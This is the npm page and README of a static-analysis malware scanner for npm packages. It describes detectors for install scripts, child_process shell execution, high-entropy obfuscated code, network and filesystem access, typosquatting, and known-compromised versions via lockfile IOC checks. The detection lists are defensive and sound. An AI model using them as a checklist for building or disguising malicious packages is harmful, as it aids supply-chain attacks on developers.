npm-malware-scanner
v3.0.0
Published
Real-time malware scanner for npm packages
Maintainers
Readme
NPM Malware Scanner
Real-time malware scanner for npm packages. Detects install scripts, shell access, obfuscated code, network access, filesystem access, typosquatting attacks, and known-compromised supply chain versions.
Key Resources Used
Supply Chain Security:
- npm Security Best Practices - Understanding npm security model
- OWASP Top 10 for CI/CD - CI/CD security risks
Static Analysis Techniques:
- Babel Parser Documentation - AST parsing for JavaScript/TypeScript
- ESLint Source Code - Pattern matching and code analysis techniques
- Shannon Entropy - Obfuscation detection using information theory
Typosquatting Research:
- Levenshtein Distance Algorithm - String similarity measurement
- Typosquatting on PyPI - Academic research on package name attacks
- npm Typosquatting Attacks - Real-world examples
npm Registry APIs:
- npm Registry API - Package metadata and download
- CouchDB Changes Feed - Real-time monitoring
Notable CVEs & Attacks:
- CVE-2021-44906 - Minimist prototype pollution
- event-stream incident - Malicious dependency injection
- ua-parser-js attack - Cryptocurrency miner in popular package
Installation
# Global installation
npm install -g npm-malware-scanner
# Or use directly with npx
npx npm-malware-scanner express 4.18.2Usage
Scan a Package
npm-scanner <package-name> <version>
# Examples
npm-scanner express 4.18.2
npm-scanner axios 1.6.0Live Monitoring
Monitor the npm registry feed in real-time:
npm-scanner --liveLockfile Scan
Scan package-lock.json, yarn.lock, or pnpm-lock.yaml for known-compromised versions and IOC dependencies without hitting the registry:
# Scan lockfiles in the current directory
npm-scanner --lockfile
# Scan lockfiles in a specific directory
npm-scanner --lockfile ./path/to/projectThis mode is useful when a version has already been unpublished from npm (as happened with [email protected] and [email protected]) — registry-based scanning returns 404, but lockfile evidence of prior installation remains.
CI/CD Integration
The scanner automatically detects CI/CD environments and adapts output format.
GitHub Actions:
- name: Security Scan
run: npm-scanner express 4.18.2Other CI Systems:
CI=true npm-scanner express 4.18.2See CI-CD-INTEGRATION.md for detailed integration guides.
Detection Capabilities
Install Scripts
Identifies packages with lifecycle scripts that execute arbitrary code:
preinstall,install,postinstallpreuninstall,uninstall,postuninstall
Severity: High
Shell Access
Detects use of child_process APIs that can run system commands:
exec,execSync,spawn,spawnSync,execFile- Shell command strings passed to process execution
Severity: High
Obfuscated Code
Calculates Shannon entropy on each source file. Files with entropy above the threshold are flagged as likely obfuscated or encoded payloads.
Severity: High
Typosquatting
Compares the package name against the top npm packages using Levenshtein distance. Close matches are flagged as potential brand-jacking attempts.
Severity: High (very close match) / Medium
Network Access
Detects packages making network requests:
- Node.js modules:
http,https,net,dgram,dns - Browser APIs:
fetch,XMLHttpRequest,WebSocket,EventSource - Popular libraries:
axios,node-fetch,got,superagent,request
Severity: Medium
Filesystem Access
Detects use of fs module operations that read, write, or modify files on disk:
writeFile,appendFile,unlink,rename,chmod,chown- Recursive directory operations (
rmdir,rm)
Severity: Medium
Known Compromised Version
Checks the requested version against a built-in database of known supply chain incidents. When a version matches and has been unpublished from npm (returning 404), the scanner reports it as a confirmed IOC rather than a generic fetch failure, and automatically runs a lockfile scan.
Severity: High
Lockfile Match
When scanning lockfiles (--lockfile mode or triggered automatically after a known-compromised 404), every resolved dependency is checked against the known-bad version list and IOC dependency list (e.g. plain-crypto-js from the axios incident).
Severity: High
Architecture
src/
├── cli.ts # CLI entry point (scan, --live, --lockfile)
├── scanner.ts # Scan orchestration
├── types.ts # TypeScript interfaces & AlertType enum
├── detectors/
│ ├── install-scripts.ts # Lifecycle script detection
│ ├── network-access.ts # Network access detection (AST + regex)
│ ├── typosquat.ts # Typosquat detection (Levenshtein distance)
│ ├── filesystem-access.ts # Filesystem write/delete detection
│ ├── obfuscation.ts # Shannon entropy analysis
│ └── shell-access.ts # child_process / exec detection
├── ioc/
│ ├── known-bad.ts # Known-compromised version database
│ └── lockfile-scanner.ts # Lockfile IOC scanner (npm/yarn/pnpm)
├── npm/
│ ├── registry.ts # Package fetching, extraction, 404 handling
│ └── feed.ts # Live CouchDB changes feed monitoring
└── utils/
├── logger.ts # Output formatting (terminal, CI, GitHub Actions)
└── environment.ts # CI/CD environment detectionDesign Decisions
Static Analysis Only
Choice: Analyze code without execution
Rationale: Safe, fast (~500ms per package), effective for most threats
Tradeoff: Cannot detect runtime behavior or heavily obfuscated code
Hybrid Detection (AST + Regex)
Choice: Combine AST parsing with regex patterns
Rationale: AST for accuracy, regex for obfuscated/dynamic code
Tradeoff: Slightly slower but more comprehensive
Popular Packages for Typosquat
Choice: Compare only against top npm packages
Rationale: Fast, practical, low false positives
Tradeoff: Misses typosquats of less popular packages
Extending the Scanner
Adding a New Detector
Create a detector file:
// src/detectors/my-detector.ts
import { Alert, DetectorResult } from '../types';
export class MyDetector {
static async detect(packagePath: string): Promise<DetectorResult> {
const alerts: Alert[] = [];
// Your detection logic
return { detected: alerts.length > 0, alerts };
}
}Register in `src/scanner.ts`:
import { MyDetector } from './detectors/my-detector';
const [installScriptResult, networkAccessResult, typosquatResult, myResult] =
await Promise.all([
InstallScriptDetector.detect(packageInfo.extractedPath),
NetworkAccessDetector.detect(packageInfo.extractedPath),
TyposquatDetector.detect(packageName),
MyDetector.detect(packageInfo.extractedPath), // Add here
]);
alerts.push(...myResult.alerts);Development
# Clone and setup
git clone https://github.com/Sunrostern/npm-scanner
cd npm-scanner
pnpm install
# Build
pnpm build
# Run tests
pnpm test
# Test with coverage
pnpm test:coverage
# Test a package
pnpm start express 4.18.2
# Test in CI mode
CI=true pnpm start express 4.18.2Testing
The project includes comprehensive unit tests for all detectors:
# Run all tests
pnpm test
# Watch mode
pnpm test:watch
# Coverage report
pnpm test:coverageTest Coverage:
- Install script detection
- Shell access detection (child_process, exec, spawn)
- Obfuscation detection (entropy analysis)
- Network access detection (http, fetch, axios, etc.)
- Filesystem access detection (fs module operations)
- Typosquat detection (Levenshtein distance)
- Edge cases and error handling
Known Limitations
- Static analysis only - Cannot detect runtime behavior or dynamically constructed payloads
- Registry-dependent - If a version is unpublished, tarball scanning falls back to lockfile IOC mode; no tarball analysis is possible
- Obfuscation ceiling - Sufficiently layered obfuscation may fall below the entropy threshold
- False positives - Legitimate packages may trigger alerts (e.g., HTTP clients flagged for network access)
- Known-bad database - Only incidents explicitly added to
src/ioc/known-bad.tsare covered; zero-day supply chain attacks are not detected until the database is updated
Performance
- Single package scan: 500ms - 2s
- Network detection: 100-500ms
- Typosquat check: ~50ms
- Live mode throughput: 1-2 packages/second
Contributing
Contributions welcome! Areas of interest:
- Expanding
src/ioc/known-bad.tswith new supply chain incidents - New detectors (crypto mining, prototype pollution, data exfiltration patterns)
- Performance improvements (parallel lockfile parsing, caching)
- Better obfuscation detection (multi-pass entropy, AST-based deobfuscation)
- Additional CI/CD integrations
License
MIT
